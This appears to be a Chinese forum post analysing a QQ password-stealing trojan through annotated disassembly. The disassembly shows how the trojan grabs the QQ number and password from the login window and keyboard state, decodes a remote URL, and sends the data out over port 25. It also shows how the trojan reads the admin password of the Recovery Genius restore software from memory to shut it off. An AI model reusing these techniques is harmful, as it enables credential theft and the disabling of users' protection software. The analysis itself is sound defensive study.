PEp0:00407E7B mov eax, [ebp+hWnd]
PEp0:00407E7E push eax ; hWnd
PEp0:00407E7F call GetWindowRect ; 获取"登录"按钮尺寸
PEp0:00407E84 lea eax, [ebp+Point]
PEp0:00407E87 push eax ; lpPoint
PEp0:00407E88 call GetCursorPos ; 将光标写到指定的结构体内
PEp0:00407E8D push [ebp+Point.y]
PEp0:00407E90 push [ebp+Point.x] ; pt
PEp0:00407E93 lea eax, [ebp+Rect]
PEp0:00407E96 push eax ; lprc
PEp0:00407E97 call PtInRect ; 判断光标是否在"登录QQ"按钮上
PEp0:00407E9C test eax, eax
PEp0:00407E9E jnz short Go_GetNumber
PEp0:00407EA0 push [ebp+Point.y]
PEp0:00407EA3 push [ebp+Point.x] ; pt
PEp0:00407EA6 lea eax, [ebp+rc]
PEp0:00407EA9 push eax ; lprc
PEp0:00407EAA call PtInRect ; 判断光标是否在" 登录TM"上
PEp0:00407EAF test eax, eax
PEp0:00407EB1 jnz short Go_GetNumber
PEp0:00407EB3 push [ebp+Point.y]
PEp0:00407EB6 push [ebp+Point.x] ; pt
PEp0:00407EB9 lea eax, [ebp+var_77]
PEp0:00407EBC push eax ; lprc
PEp0:00407EBD call PtInRect ; 判断光标是否在"登录"按钮上
PEp0:00407EC2 test eax, eax
PEp0:00407EC4 jz Go_Out ; 都是不跳走退出
PEp0:00407ECA Go_GetNumber: ; CODE XREF:
PEp0:00407ECA ; GetQQNumber+145 j
PEp0:00407ECA push offset byte_407FF0 ; lpszWindow
PEp0:00407ECF push offset aCombobox ; "ComboBox"
PEp0:00407ED4 push 0 ; hWndChildAfter
PEp0:00407ED6 push ebx ; hWndParent
PEp0:00407ED7 call FindWindowExA ; 当光标是在 登录按钮上时候跳到这里寻找 "ComboBox"控件
PEp0:00407EDC lea edx, [ebp+lParam]
PEp0:00407EDF push edx ; lParam
PEp0:00407EE0 push 32h ; wParam
PEp0:00407EE2 push 0Dh ; Msg
PEp0:00407EE4 push eax ; hWnd
PEp0:00407EE5 call SendMessageA ; 发送WM_GETTEXT取"ComboBox"控件内的值到edx
PEp0:00407EEA lea eax, [ebp+var_C]
PEp0:00407EED lea edx, [ebp+lParam]
PEp0:00407EF0 mov ecx, 33h
PEp0:00407EF5 call CmpString_1
PEp0:00407EFA mov eax, offset dword_40D6FC
PEp0:00407EFF mov edx, [ebp+var_C]
PEp0:00407F02 call sub_403BDC
PEp0:00407F07 push offset aSIGD ; "设置密码保护"
PEp0:00407F0C push offset szClass ; "Static"
PEp0:00407F11 push 0 ; hWndChildAfter
PEp0:00407F13 push ebx ; hWndParent
PEp0:00407F14 call FindWindowExA
PEp0:00407F19 test eax, eax
PEp0:00407F1B jz short loc_407F2C ;不存在"设置密码保护"的静态控件,跳走
PEp0:00407F1D mov eax, offset dword_40D700
PEp0:00407F22 mov edx, offset aEph_2 ; "EPH"
PEp0:00407F27 call sub_403BDC
PEp0:00407F2C loc_407F2C: ; CODE XREF:
PEp0:00407F2C push 0
PEp0:00407F2E mov ecx, offset SendDataNet ; 发送数据
PEp0:00407F33 mov dl, 1
PEp0:00407F35 mov eax, off_4048AC
PEp0:00407F3A call CreateThreadCallFun
PEp0:00407F3F mov eax, hhk
PEp0:00407F44 push eax ; hhk
PEp0:00407F45 call UnhookWindowsHookEx
。。。。。。。。。。。。。。。。。。。。。。。。。。
PEp0:00407F7C GetQQNumber endp
GetQQPassword函数主要是首先通过QQ登陆界面上的部分静态控件判断是否为QQ登录界面,然后获取"Edit"控件的句柄,在判断其是否为当前输入框。如果Edit不是当前输入窗口则跳走判断是否为回车键消息,如果是回车键消息则发送WM_GETTEXT消息取得QQ号码;如果不是则通过截取键盘状态获取密码。
PEp0:0040801C GetQQPassword proc near ; CODE XREF: GetQQ+44 p
。。。。。。。。。。。。。。。。。
PEp0:0040804A call GetActiveWindow ; 取得活动窗口的句柄
PEp0:0040804F mov ebx, eax
PEp0:00408051 push 14h ; nMaxCount
PEp0:00408053 lea eax, [ebp+lParamClassName]
PEp0:00408059 push eax ; lpClassName
PEp0:0040805A push ebx ; hWnd
PEp0:0040805B call GetClassNameA ; 获取其类名
PEp0:00408060 lea eax, [ebp+var_148]
PEp0:00408066 lea edx, [ebp+lParamClassName]
PEp0:0040806C mov ecx, 33h
PEp0:00408071 call CmpString_1
PEp0:00408076 mov eax, [ebp+var_148]
PEp0:0040807C mov edx, offset a32770_2 ; "#32770"
PEp0:00408081 call sub_403E4C
PEp0:00408086 jnz Go_Out
PEp0:0040808C push offset aVSI ; "注册新号码"
PEp0:00408091 push offset aStatic_0 ; "Static"
PEp0:00408096 push 0 ; hWndChildAfter
PEp0:00408098 push ebx ; hWndParent
PEp0:00408099 call FindWindowExA
PEp0:0040809E mov esi, eax
PEp0:004080A0 push offset aQqIg_0 ; "QQ号码:"
PEp0:004080A5 push offset aStatic_0 ; "Static"
PEp0:004080AA push 0 ; hWndChildAfter
PEp0:004080AC push ebx ; hWndParent
PEp0:004080AD call FindWindowExA
PEp0:004080B2 mov edi, eax
PEp0:004080B4 push offset aZI_0 ; "用户号码:"
PEp0:004080B9 push offset aStatic_0 ; "Static"
PEp0:004080BE push 0 ; hWndChildAfter
PEp0:004080C0 push ebx ; hWndParent
PEp0:004080C1 call FindWindowExA
PEp0:004080C6 mov [ebp+var_8], eax
PEp0:004080C9 push offset asc_4082F8 ; "帐号说明"
PEp0:004080CE push offset aStatic_0 ; "Static"
PEp0:004080D3 push 0 ; hWndChildAfter
PEp0:004080D5 push ebx ; hWndParent
PEp0:004080D6 call FindWindowExA
PEp0:004080DB test esi, esi
PEp0:004080DD jnz short Succeed_Go ; 找到"注册新号码"静态控件,跳走
PEp0:004080DF test edi, edi
PEp0:004080E1 jnz short Succeed_Go ; 找到"QQ号码:"静态控件,跳走
PEp0:004080E3 cmp [ebp+var_8], 0
PEp0:004080E7 jnz short Succeed_Go ; 找到"用户号码:"静态控件,跳走
PEp0:004080E9 test eax, eax
PEp0:004080EB jz Go_Out ; 包含"帐号说明"在内的所有控件都不存在,跳走退出
PEp0:004080F1 Succeed_Go: ; CODE XREF:
PEp0:004080F1 ; GetQQPassword+C5 j ...
PEp0:004080F1 push offset byte_408304 ; lpszWindow
PEp0:004080F6 push offset aEdit ; "Edit"
PEp0:004080FB push 0 ; hWndChildAfter
PEp0:004080FD push ebx ; hWndParent
PEp0:004080FE call FindWindowExA ; 寻找"Edit"控件句柄
PEp0:00408103 mov esi, eax
PEp0:00408105 push offset byte_408304 ; lpszWindow
PEp0:0040810A push offset a32770 ; "#32770"
PEp0:0040810F push 0 ; hWndChildAfter
PEp0:00408111 push ebx ; hWndParent
PEp0:00408112 call FindWindowExA ; 寻找"#32770"类型的控件
PEp0:00408117 test eax, eax
PEp0:00408119 jz short loc_40812D ; 失败跳走
PEp0:0040811B push offset byte_408304 ; lpszWindow
PEp0:00408120 push offset aEdit ; "Edit"
PEp0:00408125 push 0 ; hWndChildAfter
PEp0:00408127 push eax ; hWndParent
PEp0:00408128 call FindWindowExA ; 获取EDIT控件,在这里是密码输入框
PEp0:0040812D loc_40812D: ; CODE XREF:
PEp0:0040812D test eax, eax
PEp0:0040812F jz short GetPassWordFromKey ; 密码输入框控件获取失败,跳走从键盘状态截取密码
PEp0:00408131 mov esi, eax
PEp0:00408133 GetPassWordFromKey: ; CODE XREF: GetQQPassword+113 j
PEp0:00408133 call GetFocus
PEp0:00408138 cmp esi, eax ; 判断当前焦点是否为密码输入框
PEp0:0040813A jnz GetComboBox ; 不是跳走
PEp0:00408140 lea eax, [ebp+KeyState]
PEp0:00408146 push eax ; lpKeyState
PEp0:00408147 call GetKeyboardState ; 获取键盘状态
PEp0:0040814C push 0 ; uFlags
PEp0:0040814E lea eax, [ebp+Char]
PEp0:00408151 push eax ; lpChar
PEp0:00408152 lea eax, [ebp+KeyState]
PEp0:00408158 push eax ; lpKeyState
PEp0:00408159 mov esi, [ebp+var_4]
PEp0:0040815C mov eax, [esi+8]
PEp0:0040815F shr eax, 10h
PEp0:00408162 and eax, 0FFh
PEp0:00408167 push eax ; uScanCode
PEp0:00408168 mov eax, [esi+4]
PEp0:0040816B push eax ; uVirtKey
PEp0:0040816C call ToAscii ; 将其转换成AscII吗
PEp0:00408171 dec eax
PEp0:00408172 jnz short GetComboBox ; 跳走从控件取得ComboBox控件内数值
PEp0:004081E8 GetComboBox: ; CODE XREF:
PEp0:004081E8 mov eax, [ebp+var_4]
PEp0:004081EB cmp dword ptr [eax+4], 1C0Dh
PEp0:004081F2 jnz Go_Out
PEp0:004081F8 push offset byte_408304 ; lpszWindow
PEp0:004081FD push offset aCombobox_0 ; "ComboBox"
PEp0:00408202 push 0 ; hWndChildAfter
PEp0:00408204 push ebx ; hWndParent
PEp0:00408205 call FindWindowExA
PEp0:0040820A mov esi, eax
PEp0:0040820C lea eax, [ebp+lParamClassName]
PEp0:00408212 push eax ; lParam
PEp0:00408213 push 32h ; wParam
PEp0:00408215 push 0Dh ; Msg
PEp0:00408217 push esi ; hWnd
PEp0:00408218 call SendMessageA ; 发送WM_GETTEXT获取控件"ComboBox"内的值
PEp0:0040821D lea eax, [ebp+var_10]
PEp0:00408220 lea edx, [ebp+lParamClassName]
PEp0:00408226 mov ecx, 33h
PEp0:0040822B call CmpString_1
PEp0:00408230 push offset aSIGD_0 ; "设置密码保护"
PEp0:00408235 push offset aStatic_0 ; "Static"
PEp0:0040823A push 0 ; hWndChildAfter
PEp0:0040823C push ebx ; hWndParent
PEp0:0040823D call FindWindowExA
PEp0:00408242 test eax, eax
PEp0:00408244 jz short GoToSendData_1
PEp0:00408246 mov eax, offset dword_40D700
PEp0:0040824B mov edx, offset aEph_1 ; "EPH"
PEp0:00408250 call sub_403BDC
PEp0:00408255 GoToSendData_1: ; CODE XREF:
PEp0:00408255 mov eax, offset dword_40D6FC
PEp0:0040825A mov edx, [ebp+var_10]
PEp0:0040825D call sub_403BDC
PEp0:00408262 push 0
PEp0:00408264 mov ecx, offset SendDataNet ; 发送数据包
PEp0:00408269 mov dl, 1
PEp0:0040826B mov eax, off_4048AC
PEp0:00408270 call CreateThreadCallFun
PEp0:00408275 mov eax, hhk
PEp0:0040827A push eax ; hhk
PEp0:0040827B call UnhookWindowsHookEx
。。。。。。。。。。。。。。。。。。。。。。。。
PEp0:004082BA GetQQPassword endp
下面是数据发送部分
PEp0:0040729C SendDataNet proc near ; DATA XREF:
。。。。。。。。。。。。。。。。。。。。。
PEp0:00407509 lea edx, [ebp+var_E0]
PEp0:0040750F mov eax, offset aVcmpx?dkgsysyn ; "VCMpX?dkGsYsYnu_VRMqGbuaY>y]Xs<kUsIiGra"...
PEp0:00407514 call RevertString ; "http://www.cidu.net/asp/gsm/ip.a"
PEp0:00407519 mov eax, [ebp+var_E0]
PEp0:0040751F lea edx, [ebp+var_20]
PEp0:00407522 call OpenUrl ; 从上述URL中读取数据,由于该链接已经失效故不知道读取的是啥
。。。。。。。。。。。。。。。。。。。。。。。。。。
PEp0:00407615 push 0 ; lpWindowName
PEp0:00407617 push offset ClassName ; "Afx:400000:b"
PEp0:0040761C call FindWindowA
PEp0:00407621 test eax, eax
PEp0:00407623 jz short loc_40762E ; 寻找指定的窗口,失败睡眠后接着查找
PEp0:00407625 mov [ebp+var_8], 1
PEp0:0040762C jmp short loc_40763B ; 成功跳走
PEp0:0040762E loc_40762E: ; CODE XREF:
PEp0:0040762E push 3E8h ; dwMilliseconds
PEp0:00407633 call Sleep
PEp0:00407638 dec esi
PEp0:00407639 jnz short loc_407615 ; 跳回继续查找
数据读取成功后通过SendData_Net函数就是将数据发送出去
PEp0:004054D0 SendData_Net proc near ; CODE XREF:
。。。。。。。。。。。。。。。。。。。。。。。。。。
PEp0:00405555 call GetIPbyName ; 初始化网络,获取自身信息
PEp0:0040555A mov eax, [ebp+var_18]
PEp0:0040555D mov edx, offset a127_0_0_1 ; "127.0.0.1"
PEp0:00405562 call sub_403E4C
PEp0:00405567 jz Go_Out
PEp0:0040556D xor ebx, ebx
PEp0:0040556F mov esi, 6
PEp0:00405574 Go_InitSock: ; CODE XREF:
PEp0:00405574 mov ecx, edi
PEp0:00405576 mov edx, 19h
PEp0:0040557B mov eax, [ebp+var_4]
PEp0:0040557E call InitSock ; 初始化sock,通过TCP协议,采用25号端口发送数据
PEp0:00405583 test al, al
PEp0:00405585 jnz short loc_405593 ; 初始化成功跳走
PEp0:00405587 push 2710h ; dwMilliseconds
PEp0:0040558C call Sleep
PEp0:00405591 jmp short loc_405597 ; 睡眠10秒钟,跳回接着初始化sock
PEp0:00405593 loc_405593: ; CODE XREF:
PEp0:00405593 mov bl, 1
PEp0:00405595 jmp short Go_SendData
PEp0:00405597 loc_405597: ; CODE XREF:
PEp0:00405597 dec esi
PEp0:00405598 jnz short Go_InitSock ; 跳回接着初始化sock
PEp0:0040559A Go_SendData: ; CODE XREF:
PEp0:0040559A test bl, bl
PEp0:0040559C jz Go_Out
这里组合数据,然后将数据发送出去,代码很长就不贴出来了,详见附件
PEp0:00405750 call SendData
PEp0:00405755 lea edx, [ebp+var_54]
PEp0:00405758 mov eax, [edi]
PEp0:0040575A call RecvData
PEp0:0040575F nop
PEp0:00405760 mov eax, [edi]
PEp0:00405762 call ClearNet ; 清除网络套接字资源
PEp0:00405767
。。。。。。。。。。。。。。。。。。。。。。。
PEp0:004057A9 SendData_Net endp
下面是关闭还原精灵的部分
PEp0:0040B97C CloseHUJL: ; DATA XREF: PEp0:0040BBFB o
PEp0:0040B97C call CloseHUJL_1
PEp0:0040B981 retn
通过寻找以下名字才窗口:'LanCardS','原精','还原精灵','原精 DEMO','还原精灵 DEMO','原精21st','还原精灵21st','原精21st DEMO','还原精灵21st DEMO','还原精灵21st操作选择'然后在内存中读取密码,通过发送消息的形式发送到指定的Edit上,通过发送BM_CLICK消息相当于点击界面上的按钮将还原精灵关闭。
PEp0:00409F54 CloseHUJL_1 proc near ; CODE XREF: PEp0:CloseHUJL p
。。。。。。。。。。。。。。。。。。。
PEp0:00409F77 push eax
PEp0:00409F78 mov ecx, offset aInstallpath ; "InstallPath"
PEp0:00409F7D mov edx, offset aSoftwareGolden ; "SOFTWARE\\GoldenSoft\\Recovery Genius 21s"...
PEp0:00409F82 mov eax, 80000002h
PEp0:00409F87 call CallRegQueryValue ; 尝试读取
SOFTWARE\GoldenSoft\Recovery Genius 21st下的InstallPath值
PEp0:00409F8C cmp [ebp+var_C], 0
PEp0:00409F90 jnz short loc_409FAA ; 读取成功跳走
PEp0:00409F92 lea eax, [ebp+var_C]
PEp0:00409F95 push eax
PEp0:00409F96 mov ecx, offset aInstallpath ; "InstallPath"
PEp0:00409F9B mov edx, offset aSoftwareGold_0
; "SOFTWARE\\GoldenSoft\\Recovery Genius"
PEp0:00409FA0 mov eax, 80000002h
PEp0:00409FA5 call CallRegQueryValue ; 换注册表读取
PEp0:00409FAA loc_409FAA: ; CODE XREF: CloseHUJL_1+3C j
PEp0:00409FAA cmp [ebp+var_C], 0
PEp0:00409FAE jnz short loc_409FC8 ; 读取成功跳走
PEp0:00409FB0 lea eax, [ebp+var_C]
PEp0:00409FB3 push eax
PEp0:00409FB4 mov ecx, offset aInstallpath ; "InstallPath"
PEp0:00409FB9 mov edx, offset aSoftwareYuanzh ; "SOFTWARE\\YuanZhi\\Recovery Genius 21st"
PEp0:00409FBE mov eax, 80000002h
PEp0:00409FC3 call CallRegQueryValue ; 读取失败再换路径读取
PEp0:00409FC8 loc_409FC8: ; CODE XREF: CloseHUJL_1+5A j
PEp0:00409FC8 cmp [ebp+var_C], 0
PEp0:00409FCC jnz short loc_409FE6 ; 成功跳走
PEp0:00409FCE lea eax, [ebp+var_C]
PEp0:00409FD1 push eax
PEp0:00409FD2 mov ecx, offset aInstallpath ; "InstallPath"
PEp0:00409FD7 mov edx, offset aSoftwareYuan_0 ;
"SOFTWARE\\YuanZhi\\Recovery Genius"
PEp0:00409FDC mov eax, 80000002h
PEp0:00409FE1 call CallRegQueryValue ; 读取失败继续读取
PEp0:00409FE6 loc_409FE6: ; CODE XREF: CloseHUJL_1+78 j
PEp0:00409FE6 cmp [ebp+var_C], 0
PEp0:00409FEA jz Go_Out ; 读取失败,找不到还原精灵,跳走退出
。。。。
PEp0:00409FFE mov ecx, offset aApple_dll ; "\\Apple.dll"
PEp0:0040A003 mov edx, [ebp+var_C]
PEp0:0040A006 call sub_403D4C
PEp0:0040A00B mov eax, [ebp+var_20]
PEp0:0040A00E call Test_eax_1
PEp0:0040A013 push eax ; lpFileName
PEp0:0040A014 call GetFileAttributesA
PEp0:0040A019 cmp eax, 0FFFFFFFFh
PEp0:0040A01C jnz Go_Out ; 获取"\\Apple.dll"文件失败跳走退出
PEp0:0040A022 lea eax, [ebp+var_24]
PEp0:0040A025 mov ecx, offset aWjsyhn_tmd ; "\\WjSYhN.tmd"
PEp0:0040A02A mov edx, [ebp+var_C]
PEp0:0040A02D call sub_403D4C
PEp0:0040A032 mov eax, [ebp+var_24]
PEp0:0040A035 call Test_eax_1
PEp0:0040A03A push eax ; lpFileName
PEp0:0040A03B call GetFileAttributesA
PEp0:0040A040 cmp eax, 0FFFFFFFFh
PEp0:0040A043 jnz Go_Out ; 获取"\\WjSYhN.tmd"文件失败跳走退出
PEp0:0040A049 lea eax, [ebp+var_C]
PEp0:0040A04C mov edx, offset aHddgmon_exe ; "\\HDDGMon.exe"
PEp0:0040A051 call sub_403D08
PEp0:0040A056 mov eax, [ebp+var_C]
PEp0:0040A059 call Test_eax_1
PEp0:0040A05E mov ebx, eax
PEp0:0040A060 push ebx ; lpFileName
PEp0:0040A061 call GetFileAttributesA
PEp0:0040A066 cmp eax, 0FFFFFFFFh
PEp0:0040A069 jz Go_Out ; 获取"\\HDDGMon.exe"文件失败跳走退出
PEp0:0040A06F push 5 ; uCmdShow
PEp0:0040A071 push ebx ; lpCmdLine
PEp0:0040A072 call WinExec ; 运行 "\\HDDGMon.exe"即启动还原精灵
PEp0:0040A077 push 7D0h ; dwMilliseconds
PEp0:0040A07C call Sleep
PEp0:0040A081 push offset aLancards ; "LanCardS"
PEp0:0040A086 push offset a32770_1 ; "#32770"
PEp0:0040A08B call FindWindowA
PEp0:0040A090 mov ebx, eax
PEp0:0040A092 test ebx, ebx
PEp0:0040A094 jz Go_Out ; 寻找"LanCardS"名字的对话框失败跳走退出
PEp0:0040A09A xor eax, eax
PEp0:0040A09C call DelFile
PEp0:0040A0A1 lea eax, [ebp+dwProcessId]
PEp0:0040A0A4 push eax ; lpdwProcessId
PEp0:0040A0A5 push ebx ; hWnd
PEp0:0040A0A6 call GetWindowThreadProcessId
PEp0:0040A0AB call GetForegroundWindow
PEp0:0040A0B0 mov [ebp+hWnd], eax
PEp0:0040A0B3 cmp [ebp+hWnd], 0
PEp0:0040A0B7 jz short loc_40A0CE ; 获取当前窗口失败跳走获取桌面窗口
接下来是通过还原精灵的各种名字通过FindWinidowA找起句柄,这段代码省略了,详见附件。
PEp0:0040A1E3 test ebx, ebx
PEp0:0040A1E5 jz short loc_40A249
PEp0:0040A1E7 push 0 ; nCmdShow
PEp0:0040A1E9 push ebx ; hWnd
PEp0:0040A1EA call ShowWindow ;隐藏还原精灵窗口
PEp0:0040A1EF mov ecx, offset aS_0 ; "&S"
PEp0:0040A1F4 mov edx, offset aButton_1 ; "Button"
PEp0:0040A1F9 mov eax, ebx
PEp0:0040A1FB call IsControlTrue ; 判断控件类型是否一致
PEp0:0040A200 test eax, eax
PEp0:0040A202 jz short loc_40A249
PEp0:0040A204 push 0 ; lParam
PEp0:0040A206 push 1 ; wParam
PEp0:0040A208 push 0F1h ; Msg
PEp0:0040A20D push eax ; hWnd
PEp0:0040A20E call SendMessageA ; 发送BM_SETCHECK消息
PEp0:0040A213 mov ecx, offset aO ; "&O"
PEp0:0040A218 mov edx, offset aButton_1 ; "Button"
PEp0:0040A21D mov eax, ebx
PEp0:0040A21F call IsControlTrue
PEp0:0040A224 push 0 ; lParam
PEp0:0040A226 push 0 ; wParam
PEp0:0040A228 push 0F5h ; Msg
PEp0:0040A22D push eax ; hWnd
PEp0:0040A22E call PostMessageA; 发送BM_CLICK消息,相当于左键单击上述按钮
PEp0:0040A233 push 0 ; nCmdShow
PEp0:0040A235 push ebx ; hWnd
PEp0:0040A236 call ShowWindow ; 用SW_HIDE隐藏窗口
PEp0:0040A23B mov edx, offset aStep_1 ; "step.1"
PEp0:0040A240 mov eax, ebx
PEp0:0040A242 call SendSetTextMsg ; 给还原精灵窗口发送WM_SETTEXT消息,将还原精灵窗口标题改成step.1
PEp0:0040A247 jmp short loc_40A25D
PEp0:0040A249 loc_40A249: ; CODE XREF: CloseHUJL_1+291 j
PEp0:0040A249 push 1 ; dwMilliseconds
PEp0:0040A24B call Sleep
PEp0:0040A250 inc edi
PEp0:0040A251 cmp edi, 321h
PEp0:0040A257 jnz loc_40A0ED ; 不等于321h,跳回继续搜索
窗口隐藏后接着搜索还原精灵句柄,找到按钮"&Y"并发送单击消息使得检查管理者密码 窗口字样出来
PEp0:0040A390 push offset aSzSAA ; lpszWindow
PEp0:0040A395 push offset a32770_1 ; "#32770"
PEp0:0040A39A push 0 ; hWndChildAfter
PEp0:0040A39C push 0 ; hWndParent
PEp0:0040A39E call FindWindowExA ; 找"查管理者密码"繁体字眼窗口
PEp0:0040A3A3 mov [ebp+hWndParentPass], eax
PEp0:0040A3A6 cmp [ebp+hWndParentPass], 0
PEp0:0040A3AA jnz short loc_40A3C2 ; 找到繁体版跳走
PEp0:0040A3AC push offset aSAI ; lpszWindow
PEp0:0040A3B1 push offset a32770_1 ; "#32770"
PEp0:0040A3B6 push 0 ; hWndChildAfter
PEp0:0040A3B8 push 0 ; hWndParent
PEp0:0040A3BA call FindWindowExA ; 找 检查管理者密码 简体字眼窗口
然后通过CallReadMemory读取密码
PEp0:0040A41A call CallReadMemory ; 从内存中读取密码
PEp0:0040A48D push 0 ; lpszWindow
PEp0:0040A48F push offset aEdit_0 ; "Edit"
PEp0:0040A494 push 0 ; hWndChildAfter
PEp0:0040A496 mov eax, [ebp+hWndParentPass]
PEp0:0040A499 push eax ; hWndParent
PEp0:0040A49A call FindWindowExA
PEp0:0040A49F mov esi, eax
PEp0:0040A4A1 mov eax, [ebp+password]
PEp0:0040A4A4 call Test_eax_1
PEp0:0040A4A9 push eax ; lParam
PEp0:0040A4AA push 0 ; wParam
PEp0:0040A4AC push 0Ch ; Msg
PEp0:0040A4AE push esi ; hWnd
PEp0:0040A4AF call SendMessageA ; 发送WM_SETTEXT,将密码赋值到Edit上
PEp0:0040A4B4 mov ecx, offset aI ; "定"
PEp0:0040A4B9 mov edx, offset aButton_1 ; "Button"
PEp0:0040A4BE mov eax, [ebp+hWndParentPass]
PEp0:0040A4C1 call IsControlTrue ; 判断控件类型是否一致
PEp0:0040A4C6 push 0 ; lParam
PEp0:0040A4C8 push 0 ; wParam
PEp0:0040A4CA push 0F5h ; Msg
PEp0:0040A4CF push eax ; hWnd
PEp0:0040A4D0 call SendMessageA ; 发送BM_CLICK消息,相当于鼠标左键单击确定
PEp0:0040A4D5 push 0 ; nCmdShow
PEp0:0040A4D7 mov eax, [ebp+hWndParentPass]
PEp0:0040A4DA push eax ; hWnd
PEp0:0040A4DB call ShowWindow
PEp0:0040A70A push 0 ; nCmdShow
PEp0:0040A70C push edi ; hWnd
PEp0:0040A70D call ShowWindow ; 隐藏还原精灵对话框
PEp0:0040A712 push offset aI_0 ; lpszWindow
PEp0:0040A717 push offset aButton_2 ; "Button"
PEp0:0040A71C push 0 ; hWndChildAfter
PEp0:0040A71E push edi ; hWndParent
PEp0:0040A71F call FindWindowExA ; 找到确定按钮
PEp0:0040A724 mov esi, eax
PEp0:0040A726 test esi, esi
PEp0:0040A728 jz short loc_40A786
PEp0:0040A72A mov edx, offset aStep_6 ; "step.6"
PEp0:0040A72F mov eax, edi
PEp0:0040A731 call SendSetTextMsg ; 给还原精灵窗口发送WM_SETTEXT消息,将还原精灵窗口标题改成step.6
PEp0:0040A736 push 0 ; lParam
PEp0:0040A738 push 0 ; wParam
PEp0:0040A73A push 0F5h ; Msg
PEp0:0040A73F push esi ; hWnd
PEp0:0040A740 call SendMessageA ; 发送BM_CLICK消息,相当于鼠标左键单击"确定"
PEp0:0040A745 mov ecx, offset aB_0 ; "取"
PEp0:0040A74A mov edx, offset aButton_1 ; "Button"
PEp0:0040A74F mov eax, [ebp+hWndParentPass]
PEp0:0040A752 call IsControlTrue ; 判断控件类型是否一致
PEp0:0040A757 push 0 ; lParam
PEp0:0040A759 push 0 ; wParam
PEp0:0040A75B push 0F5h ; Msg
PEp0:0040A760 push eax ; hWnd
PEp0:0040A761 call SendMessageA ; 发送BM_CLICK消息,相当于鼠标左键单击父窗口上的取消
PEp0:0040A766 mov ecx, offset aC_2 ; "&C"
PEp0:0040A76B mov edx, offset aButton_1 ; "Button"
PEp0:0040A770 mov eax, ebx
PEp0:0040A772 call IsControlTrue ; 判断控件类型是否一致
PEp0:0040A777 push 0 ; lParam
PEp0:0040A779 push 0 ; wParam
PEp0:0040A77B push 0F5h ; Msg
PEp0:0040A780 push eax ; hWnd
PEp0:0040A781 call SendMessageA ; 发送BM_CLICK消息,相当于鼠标左键单击使得窗口退出
完整分析文档见附件,其中有木马文件,附件请到论坛下载。